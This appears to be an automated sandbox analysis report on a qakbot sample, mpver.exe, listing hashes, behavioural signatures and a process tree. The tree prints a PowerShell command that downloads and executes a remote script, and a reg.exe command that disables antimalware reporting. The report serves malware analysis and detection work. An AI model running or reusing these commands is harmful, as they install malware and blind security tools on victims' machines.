Analysis
  max time kernel:   13s
  max time network:  127s
  platform:          windows10_x64
  resource:          win10v20210410
  submitted:         19-07-2021 20:56
Static task: static1
Behavioral task: behavioral1
  Sample:   mpver.exe
  Resource: win7v20210410
Behavioral task: behavioral2
  Sample:   mpver.exe
  Resource: win10v20210410
General
  Target: mpver.exe
  Size:   36.5MB
  MD5:    07a25e7f4f3a756e64c07c07d82591a4
  SHA1:   ff3f1f7e82d1721fa0d28cad127bca6d799f40b8
  SHA256: 6f5d3879c4a516661a93499e64d7595333fb51d6a87677de25d9b7a19b41b362
  SHA512: efd1acbc61603c810b5048d5f71cfaddba3430ecf49e6a815f76b7ffa9fc48a91e1d371986199569bc15cd8051d0a67c24e8d6c6c3303ffcac0448395233b5d4
Malware Config
Extracted
  https://www.allens-treasure-house.com/books_files/001.ps1
Extracted
  qakbot
  322.109
  1515090054
Signatures

Blocklisted process makes network request (1 IoC)
  Processes:
    flow  pid   process
    12    4084  powershell.exe
Program crash (1 IoC)
  Processes:
    pid   pid_target  process       target process
    2168  4084        WerFault.exe  powershell.exe
Checks SCSI registry key(s) (3 TTPs, 6 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  Processes:
    description        ioc                                                                                                        process
    Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000                 mpver.exe
    Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\DeviceDesc      mpver.exe
    Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service         mpver.exe
    Key opened         \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000         mpver.exe
    Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc  mpver.exe
    Key value queried  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service     mpver.exe
Suspicious behavior: EnumeratesProcesses (24 IoCs)
  Processes:
    pid   process         occurrences
    3904  mpver.exe       2
    4040  mpver.exe       4
    4084  powershell.exe  3
    2168  WerFault.exe    15
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  4084  powershell.exe
    Token: SeDebugPrivilege  2168  WerFault.exe
Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
    description                       pid   process    target process  occurrences
    PID 3904 wrote to memory of 4040  3904  mpver.exe  mpver.exe       3
    PID 3904 wrote to memory of 3364  3904  mpver.exe  reg.exe         2
    PID 3904 wrote to memory of 4084  3904  mpver.exe  powershell.exe  2
Processes (indented by depth in the process tree)

C:\Users\Admin\AppData\Local\Temp\mpver.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\mpver.exe"
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\mpver.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\mpver.exe" /C
    - Checks SCSI registry key(s)
    - Suspicious behavior: EnumeratesProcesses

  C:\Windows\system32\reg.exe
    Command line: C:\Windows\system32\reg.exe ADD "HKLM\SOFTWARE\Microsoft\Microsoft AntiMalware\SpyNet" /f /t REG_DWORD /v "SpyNetReporting" /d "0"

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://www.allens-treasure-house.com/books_files/001.ps1'); Invoke-MainWorker -Command 'C:\Users\Admin\AppData\Local\Temp\gnnrhsjzilwzjqlfvytgevnba.txt'"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\WerFault.exe
      Command line: C:\Windows\system32\WerFault.exe -u -p 4084 -s 2484
      - Program crash
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Downloads
  memory/3364-121-0x0000000000000000-mapping.dmp
  memory/3904-114-0x0000000001000000-0x0000000001084000-memory.dmp  (528KB)
  memory/3904-116-0x0000000000400000-0x00000000004AE000-memory.dmp  (696KB)
  memory/4040-117-0x0000000000000000-mapping.dmp
  memory/4040-120-0x0000000000460000-0x0000000000466000-memory.dmp  (24KB)
  memory/4084-122-0x0000000000000000-mapping.dmp
  memory/4084-128-0x00000261906A0000-0x00000261906A1000-memory.dmp  (4KB)
  memory/4084-133-0x00000261A8D80000-0x00000261A8D82000-memory.dmp  (8KB)
  memory/4084-134-0x00000261AAE60000-0x00000261AAE61000-memory.dmp  (4KB)
  memory/4084-135-0x00000261A8D83000-0x00000261A8D85000-memory.dmp  (8KB)
  memory/4084-140-0x00000261A8D86000-0x00000261A8D88000-memory.dmp  (8KB)